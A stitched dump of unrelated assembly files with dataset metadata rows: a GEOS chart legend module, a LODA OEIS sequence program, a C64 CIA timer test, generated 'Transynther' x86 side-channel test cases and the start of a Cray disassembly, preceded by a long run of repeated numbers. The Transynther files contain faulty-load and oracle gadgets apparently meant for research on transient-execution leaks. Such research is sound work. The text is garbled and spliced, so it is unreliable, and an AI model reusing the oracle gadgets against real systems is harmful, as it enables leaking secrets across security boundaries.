36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36
*/
| 31.847059 | 2,999 | 0.655707 |
6dbdfd98aced33d285f1d9b1b05822a15f18c8d1 | 1,016 | asm | Assembly | Library/Chart/Legend/legendManager.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Library/Chart/Legend/legendManager.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Library/Chart/Legend/legendManager.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: legendManager.asm
AUTHOR: Chris Boyke
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Date Description
---- ---- -----------
cdb 6/10/92 Initial version.
DESCRIPTION:
$Id: legendManager.asm,v 1.1 97/04/04 17:46:31 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
include chartGeode.def
ChartClassStructures segment resource
LegendClass
LegendPairClass
LegendItemClass
method LegendItemRealize, LegendItemClass, MSG_CHART_OBJECT_REALIZE
method LegendRealize, LegendClass, MSG_CHART_OBJECT_REALIZE
ChartClassStructures ends
ChartMiscCode segment resource
include legendAttrs.asm
include legendBuild.asm
include legendGeometry.asm
include legendSelect.asm
include legendPair.asm
include legendItem.asm
ChartMiscCode ends
| 20.734694 | 71 | 0.632874 |
c7eeea9077c9b5b4795dee730343b985b54a956f | 625 | asm | Assembly | oeis/166/A166157.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/166/A166157.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/166/A166157.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A166157: a(n) = (8^n+16*(-9)^n)/17.
; Submitted by Christian Krause
; 1,-8,80,-656,6416,-53648,515600,-4378256,41501456,-356735888,3344840720,-29029824656,269858356496,-2360005731728,21789807399440,-191710220083856,1760576352843536,-15563712198881168,142325209603615760,-1262912487923059856,11510327579383394576,-102440026709843704208,931183612425448113680,-8306865535534194816656,75352085630166459001616,-673446404188628485800848,6098796569560613533917200,-54586937671141864511578256,493700290679506038953616656,-4423959803001720283787251088
mov $1,-9
pow $1,$0
mul $1,16
mov $2,8
pow $2,$0
add $1,$2
mov $0,$1
div $0,17
| 48.076923 | 474 | 0.8208 |
3649fd79ba7979328bf6b4691e567e40502504f2 | 5,374 | asm | Assembly | tests/testsuite-2.15/ascii-src/cia1tab.asm | meesokim/chips-test | 1fb7003ed96bc444820c8f7872ea7e3af2cf65d4 | [
"MIT"
] | 330 | 2017-12-11T21:20:28.000Z | 2022-03-26T08:56:51.000Z | tests/testsuite-2.15/ascii-src/cia1tab.asm | meesokim/chips-test | 1fb7003ed96bc444820c8f7872ea7e3af2cf65d4 | [
"MIT"
] | 28 | 2015-11-14T09:21:03.000Z | 2018-04-04T22:36:17.000Z | tests/testsuite-2.15/ascii-src/cia1tab.asm | meesokim/chips-test | 1fb7003ed96bc444820c8f7872ea7e3af2cf65d4 | [
"MIT"
] | 31 | 2018-07-02T06:13:31.000Z | 2022-02-18T16:50:56.000Z |
*= $0801
.byte $4c,$14,$08,$00,$97
turboass = 780
.text "780"
.byte $2c,$30,$3a,$9e,$32,$30
.byte $37,$33,$00,$00,$00
lda #1
sta turboass
jmp main
print
.block
pla
sta print0+1
pla
sta print0+2
ldx #1
print0
lda $1111,x
beq print1
jsr $ffd2
inx
bne print0
print1
sec
txa
adc print0+1
sta print2+1
lda #0
adc print0+2
sta print2+2
print2
jmp $1111
.bend
printhb
.block
pha
lsr a
lsr a
lsr a
lsr a
jsr printhn
pla
and #$0f
printhn
ora #$30
cmp #$3a
bcc printhn0
adc #6
printhn0
jsr $ffd2
rts
.bend
waitborder
.block
lda $d011
bmi ok
wait
lda $d012
cmp #30
bcs wait
ok
rts
.bend
waitkey
.block
jsr $fda3
wait
jsr $ffe4
beq wait
cmp #3
beq stop
rts
stop
lda turboass
beq basic
jmp $8000
basic
jmp $a474
.bend
;---------------------------------------
index .byte 0
reg .byte 0
areg .byte $04,$06,$01,$0d
main
jsr print
.byte 13,145
.text "cia1tab"
.byte 0
ldx #$7e
lda #$ea ;nop
makechain
sta $2000,x
dex
bpl makechain
lda #$60 ;rts
sta $207f
sei
lda #0
sta write+1
sta reg
nextreg
lda #0
sta index
nextindex
lda #$ff
sta $dc03
lda #$00
sta $dc01
sta $dc0e
sta $dc0f
lda #$7f
sta $dc0d
bit $dc0d
lda #21
sta $dc04
lda #2
sta $dc06
ldx #0
stx $dc05
stx $dc07
sta $dc04
lda #$82
sta $dc0d
lda index
eor #$ff
lsr a
php
sta jump+1
ldx reg
lda areg,x
sta readreg+1
jsr waitborder
lda #%01000111
sta $dc0f
lda #%00000011
sta $dc0e
plp
bcc jump
jump
jsr $2011
readreg
lda $dc11
write
sta $2111
inc write+1
inc index
lda index
cmp #12
bcc nextindex
inc reg
lda reg
cmp #4
bcc nextreg
;---------------------------------------
;compare result
jmp compare
right .byte $01,$02,$02,$01,$02,$02
.byte $01,$02,$02,$01,$02,$02
.byte $02,$02,$02,$01,$01,$01
.byte $00,$00,$02,$02,$02,$02
.byte $80,$c0,$80,$80,$c0,$80
.byte $80,$c0,$00,$00,$40,$00
.byte $00,$01,$01,$01,$01,$01
.byte $01,$01,$03,$83,$83,$83
compare
jsr $fda3
sei
ldx #0
comp
lda $2100,x
cmp right,x
bne diff
inx
cpx #12*4
bcc comp
jmp ok
diff
;---------------------------------------
;print result
ldy #0
jsr print
.byte 13
.text "ta "
.byte 13
.text " "
.byte 0
jsr print12
jsr print
.text "tb "
.byte 13
.text " "
.byte 0
jsr print12
jsr print
.text "pb "
.byte 13
.text " "
.byte 0
jsr print12
jsr print
.text "icr"
.byte 13
.text " "
.byte 0
jsr print12
jsr waitkey
jmp outend
print12
ldx #12
loop12
lda #32
jsr $ffd2
lda right,y
jsr printhb
dec 211
dec 211
dec 211
lda #145
jsr $ffd2
lda #32
jsr $ffd2
lda 646
pha
lda $2100,y
cmp right,y
beq nodiff
pha
lda #2
sta 646
pla
nodiff
jsr printhb
pla
sta 646
lda #17
jsr $ffd2
iny
dex
bne loop12
lda #13
jmp $ffd2
outend
;---------------------------------------
;load next part of the test suite
ok
jsr print
.text " - ok"
.byte 13,0
lda turboass
beq load
jsr waitkey
jmp $8000
load
jsr print
name .text "loadth"
namelen = *-name
.byte 0
lda #0
sta $0a
sta $b9
lda #namelen
sta $b7
lda #<name
sta $bb
lda #>name
sta $bc
pla
pla
jmp $e16f
| 18.216949 | 40 | 0.344064 |
ca66efcfa4e1d3b7f2bcb6bf9567aef3049c9f26 | 4,619 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_3150.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_3150.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_3150.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r13
push %r15
push %r9
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x183c5, %rbp
nop
nop
inc %r13
movb (%rbp), %r12b
nop
nop
nop
nop
nop
cmp $6012, %rdx
lea addresses_normal_ht+0xd245, %r10
nop
dec %r15
mov (%r10), %r9d
nop
nop
nop
nop
nop
sub $25035, %r9
lea addresses_WC_ht+0x1ae45, %rsi
lea addresses_D_ht+0x13645, %rdi
nop
xor $50748, %r13
mov $37, %rcx
rep movsw
nop
nop
nop
cmp %r9, %r9
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %r9
pop %r15
pop %r13
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r9
push %rax
push %rbx
// Faulty Load
lea addresses_PSE+0x10e45, %rax
nop
nop
nop
sub $21489, %r13
mov (%rax), %r14w
lea oracles, %r13
and $0xff, %r14
shlq $12, %r14
mov (%r13,%r14,1), %r14
pop %rbx
pop %rax
pop %r9
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_PSE', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'type': 'addresses_PSE', 'same': True, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 1, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'same': False, 'size': 4, 'congruent': 8, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WC_ht', 'congruent': 11, 'same': True}, 'dst': {'type': 'addresses_D_ht', 'congruent': 11, 'same': False}, 'OP': 'REPM'}
{'33': 21829}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
| 48.621053 | 2,999 | 0.662481 |
887bdcf58f631e98a20dfa65ada134422d4809f4 | 659 | asm | Assembly | oeis/313/A313829.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/313/A313829.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/313/A313829.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A313829: Coordination sequence Gal.6.203.5 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; Submitted by Christian Krause
; 1,5,10,16,20,25,30,35,40,44,50,55,60,65,70,76,80,85,90,95,100,104,110,115,120,125,130,136,140,145,150,155,160,164,170,175,180,185,190,196,200,205,210,215,220,224,230,235,240,245
mov $1,$0
dif $0,2
seq $1,313583 ; Coordination sequence Gal.6.345.4 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
mov $2,$0
mul $0,7
sub $0,1
mod $0,$1
mul $2,3
add $0,$2
add $0,1
| 43.933333 | 182 | 0.731411 |
e12b33ffa5542a54418f4546cbc769e3665b8b1c | 6,543 | asm | Assembly | Transynther/x86/_processed/NONE/_ht_zr_/i7-8650U_0xd2.log_21829_1219.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_ht_zr_/i7-8650U_0xd2.log_21829_1219.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_ht_zr_/i7-8650U_0xd2.log_21829_1219.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r15
push %r8
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1c67a, %r9
nop
nop
nop
nop
nop
sub $21516, %r8
mov $0x6162636465666768, %rbx
movq %rbx, (%r9)
nop
nop
nop
nop
nop
dec %r15
lea addresses_WT_ht+0x40ba, %rsi
lea addresses_WT_ht+0x1db32, %rdi
nop
and %r15, %r15
mov $99, %rcx
rep movsb
nop
inc %rsi
lea addresses_D_ht+0x1b3f9, %r9
nop
nop
nop
inc %rbx
movb $0x61, (%r9)
nop
cmp %r15, %r15
lea addresses_UC_ht+0x1e8, %rsi
lea addresses_UC_ht+0x5ba, %rdi
sub $12855, %rax
mov $18, %rcx
rep movsb
nop
nop
nop
nop
nop
inc %rsi
lea addresses_UC_ht+0x105a, %rsi
lea addresses_D_ht+0x1d70a, %rdi
nop
inc %r8
mov $69, %rcx
rep movsl
nop
nop
nop
xor $26585, %rbx
lea addresses_D_ht+0x2aea, %rsi
lea addresses_normal_ht+0x1103a, %rdi
and $7259, %rax
mov $47, %rcx
rep movsw
nop
nop
dec %r8
lea addresses_A_ht+0x3d0a, %rsi
lea addresses_normal_ht+0x995a, %rdi
nop
nop
nop
xor %r9, %r9
mov $10, %rcx
rep movsl
nop
and $60710, %rax
lea addresses_WC_ht+0xe7ba, %rsi
lea addresses_normal_ht+0x15ffa, %rdi
nop
dec %rbx
mov $29, %rcx
rep movsb
nop
nop
nop
nop
nop
add %rsi, %rsi
lea addresses_WT_ht+0xd0c2, %rax
nop
nop
nop
nop
inc %rbx
movl $0x61626364, (%rax)
nop
nop
nop
nop
xor $10151, %rax
lea addresses_UC_ht+0x1197a, %rsi
nop
add %rdi, %rdi
movb (%rsi), %r9b
sub %rcx, %rcx
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rax
pop %r9
pop %r8
pop %r15
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r15
push %r9
push %rbx
push %rcx
push %rsi
// Faulty Load
lea addresses_WT+0x1a4ba, %rsi
nop
nop
add $30460, %r10
vmovups (%rsi), %ymm3
vextracti128 $1, %ymm3, %xmm3
vpextrq $0, %xmm3, %rcx
lea oracles, %r10
and $0xff, %rcx
shlq $12, %rcx
mov (%r10,%rcx,1), %rcx
pop %rsi
pop %rcx
pop %rbx
pop %r9
pop %r15
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'size': 4, 'AVXalign': True, 'NT': False, 'congruent': 0, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 8, 'AVXalign': True, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 1, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 2, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 4, 'same': True}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 5, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 4, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 5, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': True}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}}
{'00': 20428, '49': 1401}
00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 49 00 00 00 00 00 00 49 00 49 00 00 00 49 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 49 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 49 00 00 00 49 49 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 49 49 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 49 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 49 00
*/
| 38.715976 | 2,999 | 0.661317 |
a77792a36d78f48fc133515c35a78011baeb5641 | 499 | asm | Assembly | oeis/037/A037570.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/037/A037570.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/037/A037570.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A037570: Base 5 digits are, in order, the first n terms of the periodic sequence with initial period 2,1,2.
; Submitted by Christian Krause
; 2,11,57,287,1436,7182,35912,179561,897807,4489037,22445186,112225932,561129662,2805648311,14028241557,70141207787,350706038936,1753530194682,8767650973412,43838254867061,219191274335307,1095956371676537
seq $0,33132 ; Base-5 digits are, in order, the first n terms of the periodic sequence with initial period 1,1,0.
mul $0,19
div $0,5
add $0,1
div $0,2
| 49.9 | 204 | 0.793587 |
8523e3b178fe8a7192dc97b3a281456f1f36ee25 | 265 | asm | Assembly | try/boot_print_16real.asm | benediktweihs/os-tutorial | 629db14e01141622fce72e12d17ddb56f0e98312 | [
"BSD-3-Clause"
] | null | null | null | try/boot_print_16real.asm | benediktweihs/os-tutorial | 629db14e01141622fce72e12d17ddb56f0e98312 | [
"BSD-3-Clause"
] | null | null | null | try/boot_print_16real.asm | benediktweihs/os-tutorial | 629db14e01141622fce72e12d17ddb56f0e98312 | [
"BSD-3-Clause"
] | null | null | null | print:
pusha
start:
mov ah, 0x0e
mov al, [bx]
cmp al, 0
je done
int 0x10
add bx, 1
jmp start
done:
popa
ret
print_nl:
pusha
mov ah, 0x0e
mov al, 0x0a ; newline char
int 0x10
mov al, 0x0d ; carriage return
int 0x10
popa
ret
| 9.137931 | 32 | 0.607547 |
cf84987b048a3457013bdfc1701756ce672fade5 | 75,104 | asm | Assembly | target/cos_117/disasm/iop_overlay1/TJOB.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 49 | 2020-10-09T12:29:16.000Z | 2022-03-12T02:33:35.000Z | target/cos_117/disasm/iop_overlay1/TJOB.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
